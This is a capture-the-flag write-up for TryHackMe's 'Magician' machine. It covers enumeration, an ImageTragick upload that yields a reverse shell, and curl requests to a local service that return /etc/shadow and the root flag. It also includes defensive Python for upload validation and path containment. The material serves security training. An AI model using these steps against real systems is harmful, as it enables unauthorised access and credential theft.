Magician Writeup (TryHackMe Easy Machine)

This magical website lets you convert image file formats.


Overview

Magician is an easy Linux machine from TryHackMe. This box is great for beginners, as it deals with the infamous critical vulnerability in the ImageMagick suite (ImageTragick), which you need to exploit to get RCE. There are also hints along the way as a reward for your progress.

We start by enumerating two web servers, one serving as back-end storage or an API for the other. Then we discover a message left for us on the FTP server, guiding us towards the ImageTragick exploit, in which we embed commands into a PNG file. These commands get executed after we upload the file.

After we get a shell, we discover a secret internal service that takes an input parameter “filename” and yields back the encoded content of the file provided.


Nmap scan

Starting with Nmap scan.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -A 10.10.188.136 -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-26 09:09 EDT
Nmap scan report for magician (10.10.188.136)
Host is up (0.071s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
8080/tcp open http Apache Tomcat (language: en)
|_http-title: Site doesn't have a title (application/json).
8081/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: magician
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 55.52 ms 10.9.0.1
2 55.58 ms magician (10.10.188.136)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.13 seconds

The Nmap scan showed that 3 ports are open. There’s FTP on port 21, an Apache Tomcat HTTP server on port 8080 and another HTTP server, Nginx, on port 8081. Don’t forget to add “magician” to your “/etc/hosts” file.


Web enumeration

Firstly, I checked the web server on port 8080. An error page was displayed, returning a 404 Not Found error.

Next, I looked at the web server on port 8081. There was a “PNG to JPG converter” web application.


I ran Gobuster on both web servers and discovered some interesting directories.

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u "http://magician:8080" -w /usr/share/wordlists/dirb/common.txt -t 64
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://magician:8080
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/error (Status: 500) [Size: 105]
/files (Status: 200) [Size: 2]
/upload (Status: 405) [Size: 0]
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u "http://magician:8081" -w /usr/share/wordlists/dirb/common.txt -t 64
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://magician:8081
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/css (Status: 301) [Size: 194] [--> http://magician:8081/css/]
/favicon.ico (Status: 200) [Size: 9662]
/img (Status: 301) [Size: 194] [--> http://magician:8081/img/]
/index.html (Status: 200) [Size: 1105]
/js (Status: 301) [Size: 194] [--> http://magician:8081/js/]


When I looked at the web requests with the Firefox Dev tools, there was a GET request to the first web server for “/files”. Most likely, that’s where uploaded files go.

To me, it seemed like the server on port 8080 serves as a back-end API or file storage for the web application on port 8081.

I uploaded both a PNG file and a PHP file containing a web shell. Surprisingly, there was no back-end script that validated the file type. I couldn’t execute the shell, though.

[Image: list of uploaded files on the web server hosted on port 8080]


FTP server

Upon connecting, I quickly found out that this server is anonymous login only. So I logged in as “anonymous”, waited a bit because of a login delay and got in.

┌──(kali㉿kali)-[~]
└─$ ftp magician
Connected to magician.
220 THE MAGIC DOOR
Name (magician:kali): magician
530 This FTP server is anonymous only.
ftp: Login failed
ftp> bye
221 Goodbye.

┌──(kali㉿kali)-[~]
└─$ ftp magician
Connected to magician.
220 THE MAGIC DOOR
Name (magician:kali): anonymous
331 Please specify the password.
Password:
230-Huh? The door just opens after some time? You're quite the patient one, aren't ya, it's a thing called 'delay_successful_login' in /etc/vsftpd.conf ;) Since you're a rookie, this might help you to get started: https://imagetragick.com. You might need to do some little tweaks though...
230 Login successful.

A message was displayed to me with a hint. I visited the link I was given (https://imagetragick.com/).


Exploiting ImageMagick RCE & user flag

There was an article about an RCE vulnerability found in the image processing package ImageMagick. The vulnerability arises from ImageMagick’s handling of certain file formats (such as SVG, MVG, and others) when it uses external delegate commands for image processing. Attackers could craft an image file containing embedded commands, which ImageMagick would then execute when processing the file.

ImageMagick is an open-source software suite used for creating, editing, converting, and manipulating images. It supports a wide range of image formats, including PNG, JPEG, GIF, TIFF, BMP, and many others. (ChatGPT)
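The converter on port 8081 accepted anything uploaded with a .png name, and ImageMagick decides how to parse a file from its content rather than its extension, which is exactly what ImageTragick abuses: a text document with a .png name is still treated as SVG or MVG. As an added example, not code from this box or from the original post, here is the kind of server-side check that would have broken the chain: an upload is accepted only if its bytes really are a PNG (signature plus a well-formed IHDR chunk) before anything is handed to ImageMagick. The function names, the size limit and the sample inputs are constructed for this illustration.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
MAX_UPLOAD_BYTES = 5 * 1024 * 1024  # constructed limit for the illustration


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, body, CRC32 over type+body."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def make_minimal_png(width: int = 1, height: int = 1) -> bytes:
    """Constructed, valid 8-bit RGB PNG used as the 'good' sample."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    # one scanline per row: filter byte 0 followed by RGB triples
    raw = b"".join(b"\x00" + b"\x00\x00\x00" * width for _ in range(height))
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b""))


def is_real_png(data: bytes) -> bool:
    """True only if the bytes start with the PNG signature followed by a
    well-formed IHDR chunk with a matching CRC and non-zero dimensions.
    A text file (SVG, MVG, ...) renamed to .png fails at the first check."""
    if len(data) < 33:  # 8 sig + 4 len + 4 type + 13 body + 4 crc
        return False
    if data[:8] != PNG_SIGNATURE:
        return False
    length, ctype = struct.unpack(">I4s", data[8:16])
    if ctype != b"IHDR" or length != 13:
        return False
    body = data[16:29]
    (crc,) = struct.unpack(">I", data[29:33])
    if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
        return False
    width, height = struct.unpack(">II", body[:8])
    return width > 0 and height > 0


def validate_upload(filename: str, data: bytes) -> tuple:
    """Decide whether an upload may be passed on to the converter.
    Returns (accepted, reason)."""
    if not filename.lower().endswith(".png"):
        return False, "extension not allowed"
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "file too large"
    if not is_real_png(data):
        return False, "content is not a PNG"
    return True, "ok"


# Constructed samples: a genuine PNG and a text document carrying a .png name.
REAL_PNG = make_minimal_png()
TEXT_NAMED_PNG = b"<?xml version='1.0'?><svg xmlns='http://www.w3.org/2000/svg'/>"

if __name__ == "__main__":
    for name, blob in [("cat.png", REAL_PNG), ("cat.png", TEXT_NAMED_PNG),
                       ("shell.php", REAL_PNG)]:
        print(name, validate_upload(name, blob))
```

A content check like this is only one layer. The mitigation imagetragick.com itself recommended is to disable the risky coders in ImageMagick’s policy.xml (rights="none" for EPHEMERAL, URL, HTTPS, MVG, MSL, TEXT, SHOW, WIN and PLT), so that a file which does slip through can’t reach a delegate command at all.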


After researching this CVE, I found out that the famous “PayloadsAllTheThings” GitHub repository has several prepared PNG files with working payloads. I went on with this one.

I set up a listener and uploaded the malicious PNG file. I got a shell right away as user “magician”.

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.9.1.229] from (UNKNOWN) [10.10.104.221] 43946
whoami
magician
pwd
/tmp/hsperfdata_magician

I could get into my user’s home directory, which contained the user flag. Now onto the root!


Root flag

I checked other files in the home directory. One looked like another hint.

magician@magician:~$ ls -la
total 17204
drwxr-xr-x 5 magician magician 4096 Feb 13 2021 .
drwxr-xr-x 3 root root 4096 Jan 30 2021 ..
lrwxrwxrwx 1 magician magician 9 Feb 6 2021 .bash_history -> /dev/null
-rw-r--r-- 1 magician magician 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 magician magician 3771 Apr 4 2018 .bashrc
drwx------ 2 magician magician 4096 Jan 30 2021 .cache
drwx------ 3 magician magician 4096 Jan 30 2021 .gnupg
-rw-r--r-- 1 magician magician 807 Apr 4 2018 .profile
-rw-r--r-- 1 magician magician 0 Jan 30 2021 .sudo_as_admin_successful
-rw------- 1 magician magician 7546 Jan 31 2021 .viminfo
-rw-r--r-- 1 root root 17565546 Jan 30 2021 spring-boot-magician-backend-0.0.1-SNAPSHOT.jar
-rw-r--r-- 1 magician magician 170 Feb 13 2021 the_magic_continues
drwxr-xr-x 2 root root 4096 Feb 5 2021 uploads
-rw-r--r-- 1 magician magician 24 Jan 30 2021 user.txt
magician@magician:~$ cat the_magic_continues
The magician is known to keep a locally listening cat up his sleeve, it is said to be an oracle who will tell you secrets if you are good enough to understand its meows.
magician@magician:~$

I understood it to mean that there’s some internal service running that I need to exploit. So I ran “netstat” and discovered that something is listening on port 6666.

magician@magician:~$ netstat -tlnp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:6666 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8081 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN 1049/java
tcp6 0 0 :::21 :::* LISTEN -
magician@magician:~$


I used “curl” to make a GET request to port 6666, hoping it would give me a response, and it did. There was even a trollface near the bottom of the response. I analyzed the response and noticed that there’s an input field called “filename” with the text “Enter filename”.

[Image: discovered input parameter “filename” in the response]

I got immediately excited because this looked like an invitation to arbitrary file reading.


I added “-d” to my “curl” command to send the data “filename=/etc/shadow” in the request body (which makes it a POST). I wanted to test whether it would give me back the content of a file like “/etc/shadow”. It did, but base64 encoded.

magician@magician:~$ curl http://localhost:6666 -d "filename=/etc/shadow"

I booted up CyberChef and decoded the string. Just as I thought, I got the entire file back.

So I just replaced “/etc/shadow” with “/root/root.txt” and got the flag. Don’t worry if you get a different type of encoding in the response (like Hex or Rot13); it seems to be randomized.
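The oracle on port 6666 opened whatever “filename” it was given, which is why “/etc/shadow” and “/root/root.txt” came straight back. As an added example, not the box’s actual service or code from the original post, here is that vulnerable read beside a hardened version that resolves the requested name inside one allowed directory and refuses anything that escapes it: absolute paths, “..” sequences and symlinks pointing outside. The directory, the sample file, the function names and the status codes are constructed for the illustration.

```python
import base64
import tempfile
from pathlib import Path

# Constructed sample content for the demo directory (not from the box).
SAMPLE_CONTENT = b"constructed sample content\n"


def read_file_unsafe(filename: str) -> bytes:
    """The vulnerable pattern: the request parameter is used as the path as-is.
    Any absolute path or ../ sequence reads whatever the service account can."""
    with open(filename, "rb") as f:
        return f.read()


def resolve_safely(filename: str, base_dir: Path) -> Path:
    """Map a user-supplied name onto a file inside base_dir, or raise.

    - rejects empty names and embedded NUL bytes
    - resolves symlinks before the containment check, so a link inside
      base_dir that points elsewhere is still refused
    - an absolute filename replaces base_dir in the join, which the
      containment check then catches
    """
    if not filename or "\x00" in filename:
        raise ValueError("invalid filename")
    base = base_dir.resolve()
    candidate = (base / filename).resolve()
    if candidate != base and base not in candidate.parents:
        raise PermissionError("path escapes the allowed directory")
    if not candidate.is_file():
        raise FileNotFoundError(filename)
    return candidate


def handle_request(filename: str, base_dir: Path) -> dict:
    """Hardened handler: same base64 response shape the oracle used,
    but 403 for anything outside base_dir and 404 for missing files."""
    try:
        path = resolve_safely(filename, base_dir)
    except (ValueError, PermissionError):
        return {"status": 403, "body": ""}
    except FileNotFoundError:
        return {"status": 404, "body": ""}
    return {"status": 200,
            "body": base64.b64encode(path.read_bytes()).decode("ascii")}


def decode_response(resp: dict) -> bytes:
    """Decode the base64 body of a successful response."""
    return base64.b64decode(resp["body"])


def make_demo_dir() -> Path:
    """Create a throwaway directory holding one constructed file."""
    d = Path(tempfile.mkdtemp(prefix="oracle_demo_"))
    (d / "notes.txt").write_bytes(SAMPLE_CONTENT)
    return d


if __name__ == "__main__":
    demo = make_demo_dir()
    for name in ["notes.txt", "/etc/shadow", "../../../../etc/passwd", "missing.txt"]:
        print(name, "->", handle_request(name, demo)["status"])
```

Two points worth noting in the hardened version: the containment check runs on the resolved path, so it can’t be bypassed with a symlink planted inside the allowed directory, and it is separate from the privilege question. Reading /root/root.txt worked on this box only because the service ran with enough privilege to open it; running it as an unprivileged account would have limited the damage even with the bug in place.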


Summary

Magician is an easy machine from TryHackMe and a very fun box. Unlike traditional and more serious boxes, there are numerous hints along the way, which made this machine a bit more fun. We get the chance to exploit the ImageTragick vulnerability in the ImageMagick suite, granting ourselves RCE. Once inside, we discover a strange internal service. Our sharp eyes find out that we need to provide a parameter with a file path to get its content. This machine makes us practice our cybersecurity skills, as well as our critical thinking and careful observation skills.
